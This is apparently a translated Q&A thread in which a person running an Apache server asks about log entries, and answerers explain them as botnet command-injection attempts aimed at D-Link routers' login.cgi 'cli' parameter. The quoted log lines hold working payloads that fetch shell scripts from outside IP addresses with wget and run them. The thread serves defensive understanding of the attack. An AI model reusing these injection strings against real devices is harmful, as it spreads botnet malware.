Я создаю новый сервер на Apache, на самом деле я учусь, поэтому я пробую разные вещи. Моя система безопасности уже сделана, но, конечно, я могу что-то упустить, или, если нет, я понимаю, что сегодня ни одна система не может защитить меня на 100%. Так почему я думаю, что кто-то пытался меня, только потому, что я получил в своих логах это:
1.53.11.43 - - [01/Sep/2018:23:48:30 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://148.72.176.78/ngynx%20-O%20-%3E%20/tmp/ngynx;sh%20/tmp/ngynx%27$ HTTP/1.1" 400 566 "-" "Hakai/2.0"
41.47.195.103 - - [01/Sep/2018:22:48:49 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://77.87.77.250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 566
Было еще. Я понимаю, что этот кто-то получает ошибку 400, и это неплохо для меня. Так что, на самом деле мой вопрос не в том, попытаются ли они меня, потому что я думаю, что это так, потому что это не похоже на обычный запрос на мой сайт. Я хочу получить объяснение этого запроса, чтобы понять и узнать. Что они на самом деле пытаются сделать, найти мою систему входа и отправить ее куда-нибудь?
PS Я уже знаю, что с помощью wgetэтого можно загрузить какой-то веб-сайт, я также обнаружил, что login.cgiэто программа аутентификации на основе cookie-файлов.
Спасибо!
решение1
Ваш нежеланный гость не пытается скрыть свою попытку загрузить и запустить какой-то скрипт на вашем сервере.
Он может ожидать, что у вас не только есть такой login.cgiскрипт, но он еще и не обрабатывает должным образом свои входные данные, таким образом, напрямую выполняя все после апострофа ( %27в закодированном журнале). У вас, вероятно, нет такого уязвимого скрипта, но предположение о том, что HTTP-код 400 всегда означает, что вы не затронуты, необоснованно.
Скорее всего, это неконтролируемая атака, направленная на большие группы случайных целей. Можно только предполагать, что мог содержать скрипт, который должен был быть загружен и выполнен. Можно с уверенностью предположить, что вы не сможете это определить, поскольку сервер, предоставляющий скрипт, обычно предоставляет разные скрипты(+) в зависимости от того, предполагает ли он, что атака была успешной до сих пор, или она расследуется.
Вполне возможно, что выполнение кода также считалось маловероятным для злоумышленника, вместо этого он просто собирал информацию о вашей системе. Все устройства, подключенные к Интернету, должны ожидать таких запросов на регулярной основе, и все скрипты на вашем веб-сервере должны быть написаны таким образом, чтобы вам никогда не пришлось беспокоиться об этом.
(+)Почемубудет ли злоумышленник предоставлять другие скрипты? Чтобы затруднить расследование эскалации привилегий после компрометации. Скрипт, скорее всего, будет потерян из памяти позже, поэтому для злоумышленника имеет смысл убедиться, что жертва не сможет получить скрипт позже.Какбудет ли злоумышленник предоставлять разные скрипты? Он гарантирует, что веб-сервер будет отвечать только полезной нагрузкой атаки с IP-адреса атакованной машины, очень скоро после атаки. Поскольку атака может быть либо успешной мгновенно, либо неудачной, любое последующее извлечение скрипта может быть отнесено к команде экспертов-криминалистов жертвы или исследователям безопасности. Это не новый или чисто теоретический механизм, я уже получал разные полезные нагрузки на основе IP-адресов в 2016 году (один скрипт был пустым, другой содержал команды для загрузки полезной нагрузки 3-го этапа).
решение2
Это не конкретная атака на вас лично. Скорее всего, ботнет используется для атаки многих на все возможные IP-адреса.
Скрипт login.cli, использующий параметр cli, похоже, нацелен на маршрутизаторы D-Link. Вероятно, это вариантD-Link DSL-2750B — внедрение команд ОС:
Этот модуль использует уязвимость удаленной инъекции команд в устройствах D-Link DSL-2750B. Уязвимость может быть использована через параметр "cli", который напрямую используется для вызова двоичного файла "ayecli". Уязвимы прошивки от 1.01 до 1.03.
Существуют коллекции списков блокировки для веб-серверов, таких как nginx или Apache, которые вы можете использовать для блокировки всех таких запросов. В зависимости от вашего трафика, это может быть полезно, особенно если у вас небольшой частный веб-сайт, который не ожидает большого трафика.
решение3
Я знаю, что этому посту уже больше года, однако я могу внести некоторую ясность.
Это действительно часть ботнета. Скрипт, который он пытается загрузить, является дроппером, который пытается загрузить, добавить исполняемые биты/разрешения к загруженному файлу (Dropped file), выполнить, а затем удалить файл.
Я провел анализ новой версии этого дроппера, это незакодированный скрипт оболочки. Эта сеть снова стала активной сегодня, поскольку мы приближаемся к 2020 году.
Что касается вопроса использования разных скриптов, разработчик мог сделать отдельные скрипты для запуска на разных операционных системах. Похоже, что кто-то перепаковал этот ботнет и пытается его распространить. Вот общий вирусГрафикчто показывает новую активность этого конкретного ботнета.